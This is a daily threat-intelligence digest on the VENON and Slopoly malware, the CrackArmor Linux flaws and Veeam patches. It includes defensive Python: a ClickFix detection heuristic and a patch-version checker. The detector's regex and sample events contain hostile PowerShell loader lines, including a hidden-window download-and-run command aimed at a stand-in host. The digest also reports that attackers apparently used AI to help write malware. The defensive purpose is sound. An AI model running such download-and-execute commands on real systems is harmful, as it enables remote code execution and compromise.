Cyware Daily Threat Intelligence, March 13, 2026

The Latin American banking sector is facing a strategic upgrade in attacker tooling with the arrival of VENON, a Rust-based trojan that targets 33 Brazilian financial institutions. This shift toward Rust, combined with evasive "ClickFix" social engineering, represents a calculated move by local threat actors to bypass legacy detection and compromise high-value accounts with greater speed and stability.
Financially motivated groups are beginning to integrate generative AI into their development pipelines, as evidenced by the discovery of the Slopoly malware during a recent Interlock ransomware attack. Attributed to the Hive0163 group, this PowerShell-based backdoor features structured logging and variable naming conventions that suggest AI-assisted coding was used to streamline its persistence mechanism.
A decade-long security blind spot in the Linux kernel has been exposed with the disclosure of CrackArmor, a set of nine "confused deputy" vulnerabilities in the AppArmor module. These flaws allow unprivileged local users to manipulate security profiles via pseudo-files, granting a direct path to root-level privilege escalation and the total bypass of container isolation.
Top Malware Reported in the Last 24 Hours
VENON malware targets Brazilian banks
VENON, a new Rust-based banking malware, targets 33 Brazilian financial institutions, marking a shift from traditional Delphi-based malware in Latin America. The malware employs techniques like banking overlay logic, active window monitoring, and shortcut hijacking, resembling other Latin American banking trojans. VENON uses DLL side-loading and social engineering tactics, such as ClickFix, to distribute malicious payloads via PowerShell scripts. It executes advanced evasion techniques (e.g., anti-sandbox, AMSI bypass) and establishes a WebSocket connection to a command-and-control server.
Interlock ransomware uses Slopoly malware
A new malware strain named Slopoly, likely developed using generative AI tools, played a significant role in an Interlock ransomware attack, enabling hackers to remain undetected on a compromised server for over a week while stealing data. This malware, deployed as a PowerShell script, exhibited signs of AI-assisted coding, including structured logging and clear variable names. Researchers from IBM X-Force attributed the attack to the financially motivated group Hive0163, which focuses on extortion through data theft. Although Slopoly is labeled a “Polymorphic C2 Persistence Client,” it lacks true polymorphic capabilities but can generate clients with randomized configurations. The attack was initiated through a ClickFix social engineering tactic and involved additional malware components, highlighting the evolving use of AI in cybercrime.
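Both the VENON and Slopoly campaigns above began with a ClickFix lure that ends in a PowerShell script running on the victim host. The following Python is an added detection example, not code from Cyware or from the researchers cited; it applies a common heuristic (an interpreter launched directly by the interactive shell with hidden-window, encoded-command or download-and-run arguments) to constructed process-creation events. The field names, the parent/child heuristic and the sample command lines are assumptions for illustration, not indicators from the reports.

```python
"""Flag PowerShell launches that look like ClickFix-style execution."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (field names are assumptions)."""
    event_id: int
    parent_image: str
    image: str
    command_line: str


# Heuristic (assumption, not from the report): ClickFix lures have the
# victim paste a command into the Run dialog, so the interpreter is spawned
# by the shell (explorer.exe) rather than by an installed application.
INTERACTIVE_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}

# Argument patterns typical of one-line loaders: encoded payload, hidden
# window, or download-and-execute idioms.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"invoke-webrequest|\biwr\b|downloadstring)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_clickfix_like(ev: ProcessEvent) -> bool:
    """True when an interpreter is spawned by the shell with loader-style args."""
    if basename(ev.image) not in INTERPRETERS:
        return False
    if basename(ev.parent_image) not in INTERACTIVE_PARENTS:
        return False
    return SUSPICIOUS_ARGS.search(ev.command_line) is not None


def flag_events(events):
    """Return the ids of events that match the heuristic, in input order."""
    return [ev.event_id for ev in events if is_clickfix_like(ev)]


# Constructed sample events; none of these command lines come from the reports.
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcessEvent(2, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
    # Same payload style, but spawned by an installed agent: the shell-parent
    # heuristic deliberately does not fire here (see usage note).
    ProcessEvent(3, r"C:\Program Files\ExampleVendor\agent.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcessEvent(4, r"C:\Windows\explorer.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe",
                 'pwsh -WindowStyle Hidden -Command "iwr http://example.invalid/p.ps1 | iex"'),
]

if __name__ == "__main__":
    print("flagged event ids:", flag_events(SAMPLE_EVENTS))
```

The heuristic is intentionally narrow: it catches the Run-dialog launch pattern but not a later stage that VENON reaches through DLL side-loading or a scheduled task, so it belongs alongside command-line and network telemetry (for example, unexpected WebSocket egress from a user workstation) rather than in place of them.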
Top Vulnerabilities Reported in the Last 24 Hours
CrackArmor vulnerabilities threaten Linux security
Nine vulnerabilities, collectively known as "CrackArmor," have been identified in the Linux kernel's AppArmor module. They allow unprivileged local users to bypass critical security protections and escalate their privileges to root. The flaws are confused deputy vulnerabilities: an attacker can manipulate security profiles and execute arbitrary code within the kernel, which can also lead to denial-of-service (DoS) and undermine container isolation guarantees. The vulnerabilities affect all Linux kernels since version 4.11 and are especially relevant to distributions such as Ubuntu, Debian, and SUSE that enable AppArmor by default. The issue has persisted since 2017, and with millions of enterprise Linux instances exposed, the potential for exploitation poses a significant threat to system integrity and security.
Veeam issues security updates for 7 flaws
Veeam released updates to fix seven critical vulnerabilities in its Backup & Replication software. The vulnerabilities are tracked as CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, and CVE-2026-21671, with CVSS scores up to 9.9. Exploitation risks include remote code execution, privilege escalation, and file manipulation, particularly for older versions of the software. Veeam advises users to update to version 12.3.2.4465 or 13.0.1.2067 to mitigate these risks.
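The CrackArmor and Veeam items above both reduce, for a defender, to a version question: is this kernel in the affected range with AppArmor enabled, and is this Veeam build below the fixed build for its branch? The Python below is an added example, not code from Cyware, Veeam or the AppArmor researchers. It uses only the version numbers stated on this page (kernel 4.11 as the start of the affected range; Veeam 12.3.2.4465 and 13.0.1.2067 as the fixed builds); the function names, the treatment of Veeam branches older than 12 and the sample inputs are assumptions.

```python
"""Patch-state checks for the CrackArmor and Veeam items (added example)."""
import re

# Fixed Veeam Backup & Replication builds per major branch, as stated in the
# advisory summary above.
VEEAM_FIXED_BUILDS = {
    12: (12, 3, 2, 4465),
    13: (13, 0, 1, 2067),
}

# First kernel in the CrackArmor affected range, per the summary above. The
# summary does not list fixed kernel versions, so the check below reports
# "in the affected range", not "unpatched".
CRACKARMOR_FIRST_AFFECTED = (4, 11)

_LEADING_DOTTED = re.compile(r"^(\d+(?:\.\d+)*)")


def parse_version(text: str):
    """Turn '6.8.0-45-generic' or '12.3.2.4465' into a tuple of ints.

    Anything after the leading dotted-numeric part (distro suffixes such as
    '-45-generic') is ignored.
    """
    m = _LEADING_DOTTED.match(text.strip())
    if not m:
        raise ValueError(f"not a version string: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def _pad(v, n):
    """Right-pad a version tuple with zeros so tuples compare component-wise."""
    return tuple(v) + (0,) * (n - len(v))


def in_crackarmor_range(kernel_version: str, apparmor_enabled: bool) -> bool:
    """True if the kernel is 4.11 or later and AppArmor is enabled.

    Distributions that enable AppArmor by default (Ubuntu, Debian, SUSE per the
    summary) are the ones where this matters; a kernel with AppArmor disabled
    does not expose the module's profile-manipulation paths.
    """
    if not apparmor_enabled:
        return False
    major_minor = _pad(parse_version(kernel_version), 2)[:2]
    return major_minor >= CRACKARMOR_FIRST_AFFECTED


def veeam_needs_update(installed_version: str) -> bool:
    """True if the installed Veeam build is below the fixed build for its branch.

    Assumption: branches older than 12 have no fixed build listed here, so they
    are treated as needing an upgrade to a supported branch.
    """
    v = _pad(parse_version(installed_version), 4)
    fixed = VEEAM_FIXED_BUILDS.get(v[0])
    if fixed is None:
        return v[0] < 12
    return v < fixed


if __name__ == "__main__":
    # Constructed sample inventory, not data from the reports.
    for kernel, apparmor in [("6.8.0-45-generic", True), ("4.10.17", True),
                             ("6.8.0-45-generic", False)]:
        print(f"kernel {kernel} apparmor={apparmor}: "
              f"affected_range={in_crackarmor_range(kernel, apparmor)}")
    for build in ["12.3.2.4465", "12.3.1.1139", "13.0.1.2067", "13.0.0.100", "11.0.1.1261"]:
        print(f"veeam {build}: needs_update={veeam_needs_update(build)}")
```

For the AppArmor check, pair the version test with the distribution's own advisory once fixed kernels are published, since this page does not name them; for Veeam, read the build number from the installed product rather than from the installer file name, because the two can differ after a cumulative patch.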